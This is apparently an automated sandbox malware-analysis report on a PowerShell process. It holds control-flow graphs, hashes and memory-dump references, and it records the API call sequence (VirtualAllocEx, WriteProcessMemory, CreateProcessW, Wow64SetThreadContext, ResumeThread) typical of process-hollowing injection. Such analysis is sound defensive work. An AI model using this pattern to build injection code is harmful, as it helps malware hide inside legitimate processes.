                                                                                                                  control_flow_graph 220 71d00f0-71d0115 221 71d028d-71d02d3 220->221 222 71d011b-71d0120 220->222 229 71d02d9-71d02de 221->229 230 71d042a-71d0434 call 71d0439 221->230 223 71d0138-71d0144 222->223 224 71d0122-71d0128 222->224 232 71d023a-71d0244 223->232 233 71d014a-71d014d 223->233 225 71d012c-71d0136 224->225 226 71d012a 224->226 225->223 226->223 234 71d02f6-71d02fa 229->234 235 71d02e0-71d02e6 229->235 240 71d0246-71d024f 232->240 241 71d0252-71d0258 232->241 233->232 239 71d0153-71d015a 233->239 236 71d03d7-71d03e1 234->236 237 71d0300-71d0302 234->237 242 71d02e8 235->242 243 71d02ea-71d02f4 235->243 249 71d03ef-71d03f5 236->249 250 71d03e3-71d03ec 236->250 246 71d0304-71d0310 237->246 247 71d0312 237->247 239->221 251 71d0160-71d0165 239->251 244 71d025e-71d026a 241->244 245 71d025a-71d025c 241->245 242->234 243->234 252 71d026c-71d028a 244->252 245->252 254 71d0314-71d0316 246->254 247->254 255 71d03fb-71d0407 249->255 256 71d03f7-71d03f9 249->256 257 71d017d-71d0181 251->257 258 71d0167-71d016d 251->258 254->236 261 71d031c-71d0320 254->261 262 71d0409-71d0427 255->262 256->262 257->232 259 71d0187-71d0189 257->259 263 71d016f 258->263 264 71d0171-71d017b 258->264 266 71d0199 259->266 267 71d018b-71d0197 259->267 269 71d0340 261->269 270 71d0322-71d033e 261->270 263->257 264->257 271 71d019b-71d019d 266->271 267->271 274 71d0342-71d0344 269->274 270->274 271->232 275 71d01a3-71d01a5 271->275 274->236 278 71d034a-71d035d 274->278 279 71d01bf-71d01c8 275->279 280 71d01a7-71d01ad 275->280 287 71d0363-71d0365 278->287 289 71d01ca-71d01d0 279->289 290 71d01e0-71d0237 279->290 283 71d01af 280->283 284 71d01b1-71d01bd 280->284 283->279 284->279 291 71d037d-71d03d4 287->291 292 71d0367-71d036d 287->292 293 71d01d4-71d01d6 289->293 294 71d01d2 289->294 296 71d036f 292->296 297 71d0371-71d0373 292->297 293->290 294->290 296->291 297->291
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                                                                  • API String ID: 0-3199432138
                                                                                                                  • Opcode ID: 47413442a3d3888f527e0825cf5b0dd97809beaeb2cbcb17b984e6fc14e99793
                                                                                                                  • Instruction ID: 5aa0ac6b4b6bde655fc6886af20adf45e96e69dc5a1a940a33246b8472832c6f
                                                                                                                  • Opcode Fuzzy Hash: 47413442a3d3888f527e0825cf5b0dd97809beaeb2cbcb17b984e6fc14e99793
                                                                                                                  • Instruction Fuzzy Hash: 7381F6B1B0120ADFCF299E69C5446AABBE1BF8D311F14847AD449CB281EB71DC45CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 299 71d1f18-71d1f3a 300 71d20b7-71d20d8 299->300 301 71d1f40-71d1f45 299->301 308 71d20da-71d2102 300->308 309 71d2105-71d210d 300->309 302 71d1f5d-71d1f69 301->302 303 71d1f47-71d1f4d 301->303 310 71d1f6f-71d1f72 302->310 311 71d2062-71d206c 302->311 304 71d1f4f 303->304 305 71d1f51-71d1f5b 303->305 304->302 305->302 308->309 313 71d225d-71d22a2 308->313 314 71d210f-71d2115 309->314 315 71d2125-71d2129 309->315 310->311 318 71d1f78-71d1f7f 310->318 321 71d206e-71d2077 311->321 322 71d207a-71d2080 311->322 336 71d244c-71d247c 313->336 337 71d22a8-71d22ad 313->337 316 71d2119-71d2123 314->316 317 71d2117 314->317 319 71d212f-71d2133 315->319 320 71d2208-71d2212 315->320 316->315 317->315 318->300 325 71d1f85-71d1f8a 318->325 326 71d2135-71d2146 319->326 327 71d2173 319->327 329 71d2214-71d221d 320->329 330 71d2220-71d2226 320->330 323 71d2086-71d2092 322->323 324 71d2082-71d2084 322->324 332 71d2094-71d20b4 323->332 324->332 334 71d1f8c-71d1f92 325->334 335 71d1fa2-71d1fa6 325->335 326->313 352 71d214c-71d2151 326->352 331 71d2175-71d2177 327->331 338 71d222c-71d2238 330->338 339 71d2228-71d222a 330->339 331->320 341 71d217d-71d2181 331->341 343 71d1f94 334->343 344 71d1f96-71d1fa0 334->344 335->311 348 71d1fac-71d1fb0 335->348 363 71d247e-71d249b 336->363 364 71d24b5-71d24bf 336->364 346 71d22af-71d22b5 337->346 347 71d22c5-71d22c9 337->347 340 71d223a-71d225a 338->340 339->340 341->320 350 71d2187-71d2196 341->350 343->335 344->335 353 71d22b9-71d22c3 346->353 354 71d22b7 346->354 355 71d22cf-71d22d3 347->355 356 71d23f4-71d23fe 347->356 358 71d1fd0 348->358 359 71d1fb2-71d1fce 348->359 384 71d21ae-71d2205 350->384 385 71d2198-71d219e 350->385 367 71d2169-71d2171 352->367 368 71d2153-71d2159 352->368 353->347 354->347 361 71d22d5-71d22e6 355->361 362 71d2313 355->362 369 71d240c-71d2412 356->369 370 71d2400-71d2409 356->370 365 71d1fd2-71d1fd4 358->365 359->365 361->336 396 71d22ec-71d22f1 361->396 375 71d2315-71d2317 362->375 397 71d249d-71d24af 363->397 398 71d2505-71d250a 363->398 377 71d24c8-71d24ce 364->377 378 71d24c1-71d24c5 364->378 365->311 379 71d1fda-71d1fe7 365->379 367->331 380 71d215d-71d2167 368->380 381 71d215b 368->381 371 71d2418-71d2424 369->371 372 71d2414-71d2416 369->372 383 71d2426-71d2449 371->383 372->383 375->356 388 71d231d-71d2321 375->388 389 71d24d4-71d24e0 377->389 390 71d24d0-71d24d2 377->390 411 71d1fee-71d1ff0 379->411 380->367 381->367 393 71d21a0 385->393 394 71d21a2-71d21a4 385->394 388->356 400 71d2327-71d232b 388->400 401 71d24e2-71d2502 389->401 390->401 393->384 394->384 405 71d2309-71d2311 396->405 406 71d22f3-71d22f9 396->406 397->364 398->397 400->356 407 71d2331-71d2357 400->407 405->375 409 71d22fd-71d2307 406->409 410 71d22fb 406->410 407->356 424 71d235d-71d2361 407->424 409->405 410->405 416 71d2008-71d205f 411->416 417 71d1ff2-71d1ff8 411->417 419 71d1ffc-71d1ffe 417->419 420 71d1ffa 417->420 419->416 420->416 425 71d2384 424->425 426 71d2363-71d236c 424->426 427 71d2387-71d2394 425->427 428 71d236e-71d2371 426->428 429 71d2373-71d2380 426->429 431 71d239a-71d23f1 427->431 430 71d2382 428->430 429->430 430->427
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q
                                                                                                                  • API String ID: 0-1988592219
                                                                                                                  • Opcode ID: aa2bec7464dceace6c444d7188496d8bd373321b2f004ad616ab3e7ebdfbd85d
                                                                                                                  • Instruction ID: cd8ee7b28ae920f2770a329e5e0c2115ea86f7a1987597a2f9d434cbc8e75622
                                                                                                                  • Opcode Fuzzy Hash: aa2bec7464dceace6c444d7188496d8bd373321b2f004ad616ab3e7ebdfbd85d
                                                                                                                  • Instruction Fuzzy Hash: C0F1E7B1B04306DFDB1A9F68C8047AABBE2BF85311F14C46AE5698B291DB31DC45CF91
                                                                                                                  APIs
                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 00CAC22C
                                                                                                                  • VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 00CAC320
                                                                                                                    • Part of subcall function 00CA75E8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A5A789D,00000000,?,?,?,195035B0,00000000,?,00CAC383,?,00000000,?), ref: 00CAD274
                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 00CAC6CA
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00CACB84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4270437565-0
                                                                                                                  • Opcode ID: ca4c48df7a9bdc6c7ef04f9ec9fc2f0b26cbe6c4537db23dcfc57f869ee6cfcc
                                                                                                                  • Instruction ID: fb7573c613c794b9fa7141e4e5ff82a630fec789440e5edd178ecb86b04979da
                                                                                                                  • Opcode Fuzzy Hash: ca4c48df7a9bdc6c7ef04f9ec9fc2f0b26cbe6c4537db23dcfc57f869ee6cfcc
                                                                                                                  • Instruction Fuzzy Hash: 29824E70E0021ACFDB64DF69C994BAAB7F1BF45318F1084A9D45AAB251DB34EE84CF50
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: de5be765c15e95c2f52a275b6d36d3457648ede1d0be1a3fd32cbe4eb1ecfc7d
                                                                                                                  • Instruction ID: 8b09502eb83d18c171a71a033a82a2c2d87c33dc2452a0b3f694737c71ca0e7f
                                                                                                                  • Opcode Fuzzy Hash: de5be765c15e95c2f52a275b6d36d3457648ede1d0be1a3fd32cbe4eb1ecfc7d
                                                                                                                  • Instruction Fuzzy Hash: C4525174A0121ACFDB24DF28C985BAAB7F1BF46318F14C5A9D46A97251DB34EE80CF50

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1055 71d09a9-71d09eb 1057 71d0bc6-71d0c0e 1055->1057 1058 71d09f1-71d09f6 1055->1058 1072 71d0d7b-71d0d98 1057->1072 1073 71d0c14-71d0c19 1057->1073 1059 71d0a0e-71d0a12 1058->1059 1060 71d09f8-71d09fe 1058->1060 1064 71d0a18-71d0a1c 1059->1064 1065 71d0b73-71d0b7d 1059->1065 1062 71d0a00 1060->1062 1063 71d0a02-71d0a0c 1060->1063 1062->1059 1063->1059 1067 71d0a2f 1064->1067 1068 71d0a1e-71d0a2d 1064->1068 1069 71d0b7f-71d0b88 1065->1069 1070 71d0b8b-71d0b91 1065->1070 1071 71d0a31-71d0a33 1067->1071 1068->1071 1074 71d0b97-71d0ba3 1070->1074 1075 71d0b93-71d0b95 1070->1075 1071->1065 1079 71d0a39-71d0a59 1071->1079 1094 71d0dc9 1072->1094 1095 71d0d9a-71d0dad 1072->1095 1077 71d0c1b-71d0c21 1073->1077 1078 71d0c31-71d0c35 1073->1078 1080 71d0ba5-71d0bc3 1074->1080 1075->1080 1082 71d0c25-71d0c2f 1077->1082 1083 71d0c23 1077->1083 1085 71d0c3b-71d0c3d 1078->1085 1086 71d0d2a-71d0d34 1078->1086 1112 71d0a78 1079->1112 1113 71d0a5b-71d0a76 1079->1113 1082->1078 1083->1078 1091 71d0c4d 1085->1091 1092 71d0c3f-71d0c4b 1085->1092 1088 71d0d36-71d0d3f 1086->1088 1089 71d0d42-71d0d48 1086->1089 1096 71d0d4e-71d0d5a 1089->1096 1097 71d0d4a-71d0d4c 1089->1097 1099 71d0c4f-71d0c51 1091->1099 1092->1099 1103 71d0dcb-71d0dcd 1094->1103 1104 71d0dd7-71d0df4 1094->1104 1109 71d0dbd 1095->1109 1110 71d0daf-71d0dbb 1095->1110 1101 71d0d5c-71d0d78 1096->1101 1097->1101 1099->1086 1105 71d0c57-71d0c59 1099->1105 1103->1104 1119 71d0e5a-71d0e5f 1104->1119 1120 71d0df6-71d0e07 1104->1120 1107 71d0c69 1105->1107 1108 71d0c5b-71d0c67 1105->1108 1115 71d0c6b-71d0c6d 1107->1115 1108->1115 1116 71d0dbf-71d0dc1 1109->1116 1110->1116 1117 71d0a7a-71d0a7c 1112->1117 1113->1117 1115->1086 1122 71d0c73-71d0c75 1115->1122 1123 71d0e0d-71d0e17 1116->1123 1124 71d0dc3 1116->1124 1117->1065 1121 71d0a82-71d0a84 1117->1121 1119->1120 1120->1123 1127 71d0a94 1121->1127 1128 71d0a86-71d0a92 1121->1128 1129 71d0c8f-71d0c93 1122->1129 1130 71d0c77-71d0c7d 1122->1130 1131 71d0e19-71d0e1f 1123->1131 1132 71d0e22-71d0e28 1123->1132 1124->1094 1133 71d0a96-71d0a98 1127->1133 1128->1133 1140 71d0cad-71d0d27 1129->1140 1141 71d0c95-71d0c9b 1129->1141 1136 71d0c7f 1130->1136 1137 71d0c81-71d0c8d 1130->1137 1138 71d0e2e-71d0e3a 1132->1138 1139 71d0e2a-71d0e2c 1132->1139 1133->1065 1142 71d0a9e-71d0abe 1133->1142 1136->1129 1137->1129 1143 71d0e3c-71d0e57 1138->1143 1139->1143 1144 71d0c9d 1141->1144 1145 71d0c9f-71d0cab 1141->1145 1156 71d0ad6-71d0ada 1142->1156 1157 71d0ac0-71d0ac6 1142->1157 1144->1140 1145->1140 1160 71d0adc-71d0ae2 1156->1160 1161 71d0af4-71d0af8 1156->1161 1158 71d0ac8 1157->1158 1159 71d0aca-71d0acc 1157->1159 1158->1156 1159->1156 1162 71d0ae4 1160->1162 1163 71d0ae6-71d0af2 1160->1163 1164 71d0aff-71d0b01 1161->1164 1162->1161 1163->1161 1165 71d0b19-71d0b70 1164->1165 1166 71d0b03-71d0b09 1164->1166 1168 71d0b0d-71d0b0f 1166->1168 1169 71d0b0b 1166->1169 1168->1165 1169->1165
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2291298209
                                                                                                                  • Opcode ID: ae60260b30327909ec2b6452485f42f851dac323905031f7840232bda7c28830
                                                                                                                  • Instruction ID: 00cec27a5dd88d1ecc8c05bee89d35e9f70256c10d261ee4f55057079e4db183
                                                                                                                  • Opcode Fuzzy Hash: ae60260b30327909ec2b6452485f42f851dac323905031f7840232bda7c28830
                                                                                                                  • Instruction Fuzzy Hash: B73107F4A043069FDF268E24C811B7A7BA5AF99A54F59806AE400DB1D1EB75CE40CF72

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1171 71d1381-71d13c6 1173 71d13cc-71d13d1 1171->1173 1174 71d1572-71d1584 1171->1174 1175 71d13e9-71d13ed 1173->1175 1176 71d13d3-71d13d9 1173->1176 1188 71d159b-71d15ba 1174->1188 1189 71d1586-71d1599 1174->1189 1179 71d151e-71d1528 1175->1179 1180 71d13f3-71d13f5 1175->1180 1177 71d13dd-71d13e7 1176->1177 1178 71d13db 1176->1178 1177->1175 1178->1175 1185 71d152a-71d1533 1179->1185 1186 71d1536-71d153c 1179->1186 1182 71d1405 1180->1182 1183 71d13f7-71d1403 1180->1183 1187 71d1407-71d1409 1182->1187 1183->1187 1191 71d153e-71d1540 1186->1191 1192 71d1542-71d154e 1186->1192 1187->1179 1193 71d140f-71d1413 1187->1193 1194 71d16ec-71d171d 1188->1194 1195 71d15c0-71d15c5 1188->1195 1189->1188 1196 71d1550-71d156f 1191->1196 1192->1196 1198 71d1415-71d1424 1193->1198 1199 71d1426 1193->1199 1211 71d172d 1194->1211 1212 71d171f-71d172b 1194->1212 1200 71d15dd-71d15e1 1195->1200 1201 71d15c7-71d15cd 1195->1201 1206 71d1428-71d142a 1198->1206 1199->1206 1203 71d169e-71d16a8 1200->1203 1204 71d15e7-71d15e9 1200->1204 1207 71d15cf 1201->1207 1208 71d15d1-71d15db 1201->1208 1213 71d16aa-71d16b2 1203->1213 1214 71d16b5-71d16bb 1203->1214 1209 71d15f9 1204->1209 1210 71d15eb-71d15f7 1204->1210 1206->1179 1215 71d1430-71d1432 1206->1215 1207->1200 1208->1200 1220 71d15fb-71d15fd 1209->1220 1210->1220 1221 71d172f-71d1731 1211->1221 1212->1221 1222 71d16bd-71d16bf 1214->1222 1223 71d16c1-71d16cd 1214->1223 1216 71d1434-71d1440 1215->1216 1217 71d1442 1215->1217 1224 71d1444-71d1446 1216->1224 1217->1224 1220->1203 1225 71d1603-71d1605 1220->1225 1226 71d179f-71d17a9 1221->1226 1227 71d1733-71d1752 1221->1227 1228 71d16cf-71d16e9 1222->1228 1223->1228 1224->1179 1229 71d144c-71d144e 1224->1229 1232 71d161f-71d162a 1225->1232 1233 71d1607-71d160d 1225->1233 1230 71d17ab-71d17af 1226->1230 1231 71d17b2-71d17b8 1226->1231 1261 71d1754-71d1760 1227->1261 1262 71d1762 1227->1262 1236 71d1468-71d1473 1229->1236 1237 71d1450-71d1456 1229->1237 1238 71d17be-71d17ca 1231->1238 1239 71d17ba-71d17bc 1231->1239 1249 71d162c-71d1632 1232->1249 1250 71d1642-71d169b 1232->1250 1240 71d160f 1233->1240 1241 71d1611-71d161d 1233->1241 1246 71d1475-71d1478 1236->1246 1247 71d1482-71d148e 1236->1247 1244 71d1458 1237->1244 1245 71d145a-71d1466 1237->1245 1248 71d17cc-71d17ea 1238->1248 1239->1248 1240->1232 1241->1232 1244->1236 1245->1236 1246->1247 1252 71d149c-71d14a3 1247->1252 1253 71d1490-71d1492 1247->1253 1257 71d1634 1249->1257 1258 71d1636-71d1638 1249->1258 1265 71d14aa-71d14ac 1252->1265 1253->1252 1257->1250 1258->1250 1264 71d1764-71d1766 1261->1264 1262->1264 1264->1226 1266 71d1768-71d1785 1264->1266 1268 71d14ae-71d14b4 1265->1268 1269 71d14c4-71d151b 1265->1269 1274 71d17ed-71d17f2 1266->1274 1275 71d1787-71d1799 1266->1275 1271 71d14b8-71d14ba 1268->1271 1272 71d14b6 1268->1272 1271->1269 1272->1269 1274->1275 1275->1226
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2068080135.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_71d0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4'^q$$^q$$^q
                                                                                                                  • API String ID: 0-2291298209
                                                                                                                  • Opcode ID: 89eba0f9d421cd8e91196bc7e261f15d6e4c39dc60c47eae543fd373edbe191e
                                                                                                                  • Instruction ID: 134752d6cbc8f7802707a0466335615068f42049120236655ebf00ac951bb98b
                                                                                                                  • Opcode Fuzzy Hash: 89eba0f9d421cd8e91196bc7e261f15d6e4c39dc60c47eae543fd373edbe191e
                                                                                                                  • Instruction Fuzzy Hash: 8131C4B0A0030EFFCB2A8F19C5486A577F5AF42620F1B85A6D8158B1D2E734CD45EF62

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1277 cacde4-cad23e 1280 cad248-cad281 WriteProcessMemory 1277->1280 1281 cad240-cad246 1277->1281 1282 cad28a-cad2ab 1280->1282 1283 cad283-cad289 1280->1283 1281->1280 1283->1282
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A5A789D,00000000,?,?,?,195035B0,00000000,?,00CAC383,?,00000000,?), ref: 00CAD274
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: 881d352705896f89074354e529bb37f660fdce77b34817cc05ea4eb54c3bab2d
                                                                                                                  • Instruction ID: c3c112f6e248c038b185e2289b46ac85480fa0ca21af576570ecbf250b1720a4
                                                                                                                  • Opcode Fuzzy Hash: 881d352705896f89074354e529bb37f660fdce77b34817cc05ea4eb54c3bab2d
                                                                                                                  • Instruction Fuzzy Hash: FB3139B58053899FCB11CFA9C844ADEBFF8FF4A320F04849AE554E7251C778A944CBA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1285 caca34-cacab9 1287 cacabb-cacabe 1285->1287 1288 cacac1-cacac8 1285->1288 1287->1288 1289 cacaca-cacad0 1288->1289 1290 cacad3-cacae9 1288->1290 1289->1290 1291 cacaeb-cacaf1 1290->1291 1292 cacaf4-cacb97 CreateProcessW 1290->1292 1291->1292 1294 cacb99-cacb9f 1292->1294 1295 cacba0-cacc18 1292->1295 1294->1295 1302 cacc2a-cacc31 1295->1302 1303 cacc1a-cacc20 1295->1303 1304 cacc48 1302->1304 1305 cacc33-cacc42 1302->1305 1303->1302 1307 cacc49 1304->1307 1305->1304 1307->1307
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00CACB84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: ec4f3ffdcdbb8dac72d505061b77772b64f22857237dc4677620a99aa79dfea6
                                                                                                                  • Instruction ID: 63666496e41b4a10120cb976c0f6a4126df06f72c95f6d91c641a74a7b783646
                                                                                                                  • Opcode Fuzzy Hash: ec4f3ffdcdbb8dac72d505061b77772b64f22857237dc4677620a99aa79dfea6
                                                                                                                  • Instruction Fuzzy Hash: 50512A71D0125ADFDB24CFA9C980BDDBBB5BF49314F0085AAE909B7240DB759A84CF60

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1308 ca75c4-cacab9 1310 cacabb-cacabe 1308->1310 1311 cacac1-cacac8 1308->1311 1310->1311 1312 cacaca-cacad0 1311->1312 1313 cacad3-cacae9 1311->1313 1312->1313 1314 cacaeb-cacaf1 1313->1314 1315 cacaf4-cacb97 CreateProcessW 1313->1315 1314->1315 1317 cacb99-cacb9f 1315->1317 1318 cacba0-cacc18 1315->1318 1317->1318 1325 cacc2a-cacc31 1318->1325 1326 cacc1a-cacc20 1318->1326 1327 cacc48 1325->1327 1328 cacc33-cacc42 1325->1328 1326->1325 1330 cacc49 1327->1330 1328->1327 1330->1330
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00CACB84
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 963392458-0
                                                                                                                  • Opcode ID: 673ab1cfe77e30e14f10a8bc9603eb49ce929f2b0412a5767691344e247eaffc
                                                                                                                  • Instruction ID: f9f92239feb2492bbc6d2bbf35218caf4ba3cb6c80d8be7a12d00aee6b7705a9
                                                                                                                  • Opcode Fuzzy Hash: 673ab1cfe77e30e14f10a8bc9603eb49ce929f2b0412a5767691344e247eaffc
                                                                                                                  • Instruction Fuzzy Hash: 7E512971D0121ADFDB24CF59C980BDDBBB5BF49314F1085AAE909B7240DB759A88CF90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1331 ca75e8-cad23e 1333 cad248-cad281 WriteProcessMemory 1331->1333 1334 cad240-cad246 1331->1334 1335 cad28a-cad2ab 1333->1335 1336 cad283-cad289 1333->1336 1334->1333 1336->1335
                                                                                                                  APIs
                                                                                                                  • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A5A789D,00000000,?,?,?,195035B0,00000000,?,00CAC383,?,00000000,?), ref: 00CAD274
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3559483778-0
                                                                                                                  • Opcode ID: 371ca979ca5e2619428836e179fe24a6aa8af97d9323b680aad2f65f09a6a8a2
                                                                                                                  • Instruction ID: c0c264f52996f6bcce60504d9d095c5af4e1c40b60ca09d1d8b4027316300a53
                                                                                                                  • Opcode Fuzzy Hash: 371ca979ca5e2619428836e179fe24a6aa8af97d9323b680aad2f65f09a6a8a2
                                                                                                                  • Instruction Fuzzy Hash: B82109B1900309DFCB10CF9AC944BDEBBF4FB49324F508529E519A7600D374A944CF65

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1338 ca75d0-caccc0 1340 cacccc-caccf8 Wow64SetThreadContext 1338->1340 1341 caccc2-caccca 1338->1341 1342 caccfa-cacd00 1340->1342 1343 cacd01-cacd22 1340->1343 1341->1340 1342->1343
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,195035B0,?,?,00CAC05A), ref: 00CACCEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: a5b79d76734d28e0700efc75e81ed25d41e21745410eb3f32c9f04df511609cd
                                                                                                                  • Instruction ID: e267e7de0dfbc13f59841e7254bfa283f8e44732d36f7d665e376f8b59da3c82
                                                                                                                  • Opcode Fuzzy Hash: a5b79d76734d28e0700efc75e81ed25d41e21745410eb3f32c9f04df511609cd
                                                                                                                  • Instruction Fuzzy Hash: B51129B1D0034A8FCB10DF9AC884BDEFBF4EB89324F148029D418A3600D778A545CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1345 ca75f4-caccc0 1347 cacccc-caccf8 Wow64SetThreadContext 1345->1347 1348 caccc2-caccca 1345->1348 1349 caccfa-cacd00 1347->1349 1350 cacd01-cacd22 1347->1350 1348->1347 1349->1350
                                                                                                                  APIs
                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,195035B0,?,?,00CAC05A), ref: 00CACCEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2024462818.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_ca0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 983334009-0
                                                                                                                  • Opcode ID: 0a357e1a4df870da4a9a73aaa2445c12a8f69b48301a822e3eb725dde3a448e4
                                                                                                                  • Instruction ID: e7ae6dc7d43b2289f820c997de92e0870097baa9f7e1fa2d9913fca109100c1b
                                                                                                                  • Opcode Fuzzy Hash: 0a357e1a4df870da4a9a73aaa2445c12a8f69b48301a822e3eb725dde3a448e4
                                                                                                                  • Instruction Fuzzy Hash: E61137B2D0034A8FCB10DF9AC984BDEFBF4EB89324F148029E418A3600D778A545CFA5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
